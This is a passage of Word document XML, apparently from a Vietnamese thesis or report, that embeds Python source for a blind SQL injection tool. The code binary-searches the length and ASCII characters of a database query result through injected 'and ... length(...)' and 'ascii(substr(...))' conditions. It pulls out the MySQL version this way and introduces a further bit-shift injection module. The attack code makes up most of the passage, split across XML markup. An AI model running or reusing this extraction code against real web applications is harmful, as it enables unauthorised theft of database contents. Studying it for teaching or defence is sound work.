            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>"required"</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>True,</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>"description"</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>"Pattern to check True/False"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>}</w:t>
            </w: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imin </w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>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imax </w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>self.maxLength</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t xml:space="preserve">temp </w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>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while(imin &lt;= imax):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t xml:space="preserve">imid </w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>(imin + imax)/2</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>if(self.checkQuery(" and {0}&lt;=length({1})".format(imid,query)) == True):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t># &lt; key</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t xml:space="preserve">imin </w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>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t xml:space="preserve">temp </w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>imid</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 xml:space="preserve">imax </w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>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t>if(imin == imax):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t xml:space="preserve">self.resultLength </w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t xml:space="preserve">= </w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>imid</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>return imin</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>if(imax == 0):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>return Non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 xml:space="preserve">self.resultLength </w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t xml:space="preserve">= </w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>temp</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>return temp</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>def getMySQLVersion(self):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t># Query = version()</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>self.logger.info("Get MySQL version")</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:lastRenderedPageBreak/>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>self.runMySQLQuery("version()")</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 Binary search</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 Single character</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t xml:space="preserve">imin </w:t>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r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t xml:space="preserve">imax </w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>self.maxLength</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t xml:space="preserve">temp </w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>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r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>while(imin &lt;= imax):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t xml:space="preserve">imid </w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>(imin + imax)/2</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>if(self.checkQuery(" and {0}&lt;=ascii(substr({1},{2},1))".format(imid,query, (i+1))) == Tru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lt; key</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imin </w:t>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temp </w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>imid</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">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imax </w:t>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r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>if(imax == 0):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>self.logger.info("Character not found!")</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>exit()</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:lastRenderedPageBreak/>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t>self.logger.info("Found character number {0} is: {1}".format(i+1, chr(temp)))</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t xml:space="preserve">self.result </w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>+=</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>chr(temp)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t># Second get result</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>def checkQuery(self, payload):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t># Return true/false of query</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t># If contain, return True, if not, return False</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t># Or use regex</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if(r.text.find(self.basicOptions["PATTERN"]["currentSetting"]) &gt; 0):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>return Tru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return False</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">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p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t># # Equal payload</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t xml:space="preserve"># equalPayload </w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>" and length({0})={1}".format(query, imid)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t># if(self.checkQuery(equalPayload) == True):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t># If found key</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t xml:space="preserve">self.resultLength </w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t xml:space="preserve">= </w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>imid</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>return imid</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
              <w:rPr>
                <w:szCs w:val="28"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="00FC6730">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="137" w:name="_Toc459822531"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Module Blind SQL injection sử dụng phép dịch bit</w:t>
      </w:r>
      <w:bookmarkEnd w:id="137"/>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lastRenderedPageBreak/>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bit shift"</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self.maxLength </w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>255</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 xml:space="preserve">self.basicOptions["PATTERN"] </w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
